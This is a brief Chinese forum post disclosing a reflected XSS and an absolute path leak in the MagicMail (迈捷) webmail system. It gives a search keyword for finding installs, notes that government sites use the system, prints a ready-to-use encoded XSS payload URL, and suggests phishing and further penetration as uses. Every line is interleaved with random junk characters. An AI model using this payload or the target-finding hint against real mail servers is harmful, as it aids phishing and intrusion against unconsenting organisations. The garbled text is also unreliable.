今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞: S# f' H; Z) T
5 P7 ~ T6 J1 ~! K
3 D" ?2 L( J& Q& `. m
包含 一个反射性XSS 以及 绝对路径泄漏
9 X' X- ]. a! ?9 _: ~看了看 貌似全部是linux的。
, I |' K* ^( o0 b$ r- ~
: B' w0 y5 E: M- \: n$ l3 C关键字:迈捷邮件系统 by MagicMail$ F. s. z) i4 A) h
4 A$ L9 h1 B: U0 ^/ o; A5 i) q8 c+ w$ `
可以看到很多政府网站都用这个邮件系统# Q8 P) d w4 h8 ~
3 o. `" R! V" P, a- y* U
绝对路径 http://madman.in/index.php?login_type=declare&language=2 _8 G2 W6 Y" j
" `+ Z. f; q2 k+ c0 i
) B' c& p I1 ]$ }, o% u4 n: o
6 l3 [" X/ z; i t9 I2 @0 [* kXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E" h" ?7 o u5 ^
% S6 D) T5 W' R! l9 a
! [' c6 g q$ Q e( H
- V' e( n6 \7 @3 C/ S+ o
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等- Z5 ^4 K/ k7 S9 D# l" ]6 j
* |$ z h+ {* Z修复方案:看官方补丁吧。0 n$ w A' A' P9 P0 O" j) R
|